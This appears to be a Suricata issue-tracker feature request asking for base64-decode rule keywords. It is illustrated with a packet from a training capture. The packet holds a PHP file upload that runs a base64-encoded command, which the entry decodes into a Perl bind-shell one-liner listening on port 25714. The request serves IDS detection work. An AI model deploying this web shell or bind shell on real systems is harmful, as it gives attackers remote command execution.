Project

General

Profile

Actions

Feature #380

closed

Base64 decoding

Added by Peter Manev almost 13 years ago. Updated over 8 years ago.

Status:
Closed
Priority:
Normal
Assignee:
-
Target version:
-
Effort:
Difficulty:
Label:

Description

I think it is important for Suricata to support Base64 decode/data rule keywords (a few of them).

pcap 22to35.pcap attached.
In it (packet #12 - if you open it with wireshark)

This below is the hex data in packet #12 from 22to35.pcap

3b205048505345535349443d5b2a5d204572726f722072657472696576696e6720636f6f6b6965210a0d0a436f6e74656e742d4c656e6774683a203338350d0a0d0a2d2d6432746d53490d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d227573657266696c65223b2066696c656e616d653d224f624879644269353157677230636a48514936752e706870220d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a0d0a3c3f7068702073797374656d286261736536345f6465636f64652827634756796243417454556c504943316c4943636b6344316d62334a724b436b375a586870644378705a6952774f33646f6157786c4b43526a5057356c6479424a547a6f365532396a613256304f6a704a546b56554b4578765932467355473979644377794e5463784e4378535a58567a5a5377784c4578706333526c62696b74506d466a5932567764436c374a483474506d5a6b6233426c6269676b597978334b5474545645524a5469302b5a6d5276634756754b43526a4c4849704f334e356333526c625352664948646f6157786c504435394a773d3d2729293f3e0d0a2d2d6432746d53492d2d

This below is the same data into text (ASCII)

; PHPSESSID=[*] Error retrieving cookie! ##here at the end most likely there is missing colon, maybe...

Content-Length: 385

--d2tmSI
Content-Disposition: form-data; name="userfile"; filename="ObHydBi51Wgr0cjHQI6u.php" 
Content-Type: text/plain

<?php system(base64_decode('cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwO3doaWxlKCRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCwyNTcxNCxSZXVzZSwxLExpc3RlbiktPmFjY2VwdCl7JH4tPmZkb3BlbigkYyx3KTtTVERJTi0+ZmRvcGVuKCRjLHIpO3N5c3RlbSRfIHdoaWxlPD59Jw=='))?>
--d2tmSI--

This below is the decoded (from base 64) to asci data in the "php system(base64_decode..." function

perl -MIO -e '$p=fork();exit,if$p;while($c=new IO::Socket::INET(LocalPort,25714,Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}'

or the attack itself, since this is a pcap from the cyber games/trainings.

We could effectively still search for the data using rules, but we have to covert text to base64 and use it as "content" and it gets tricky.

It would be much easier if we have base64 decode keyword, since there are a lot of on-line apps that use base64.

packet #7 is the same thing.


Files

22to35.pcap (2.25 KB) 22to35.pcap Peter Manev, 11/16/2011 03:51 AM
Actions

Also available in: Atom PDF